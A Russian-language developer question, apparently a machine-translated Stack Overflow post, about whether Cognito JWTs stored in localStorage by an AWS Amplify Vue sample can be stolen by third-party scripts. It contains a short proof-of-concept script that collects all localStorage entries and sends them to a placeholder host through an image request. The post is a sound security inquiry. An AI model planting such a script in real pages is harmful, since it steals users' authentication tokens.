Я работаю с aws-samples / aws-ampify-vue семплом, в котором используется aws / aws-усиление .Я пытаюсь понять, как JWT используется с Cognito для аутентификации, и я не понимаю, как JWT, которые я получаю после аутентификации, защищены от эксфильтрации и использования любым изсторонние библиотеки JavaScript, которые я мог бы использовать.
Я клонировал пример и следовал инструкциям для его настройки.Затем я изменил index.html, добавив <script>:
<script src="https://example.com/list-localstorage.js"></script>
Затем я разместил list-localstorage.js на example.com.Содержимое:
// Ref: https://stackoverflow.com/a/28306101/624726
var allStorage = Object.keys(localStorage).reduce(function(obj, str) {
obj[str] = localStorage.getItem(str);
return obj
}, {});
// Ref: https://stackoverflow.com/a/5049668/624726
(new Image).src = 'https://example.net/log-storage?' + JSON.stringify(allStorage);
Когда я смотрю журналы доступа для example.net, я вижу, как регистрируются мои JWT.Мне удалось проверить подпись на токенах id и access.
Могут ли они быть использованы для доступа к защищенному контенту?Что они делают, чтобы предотвратить (например, вредоносное объявление JavaScript) чтение всех данных в localStorage и кражу с использованием моих JWT?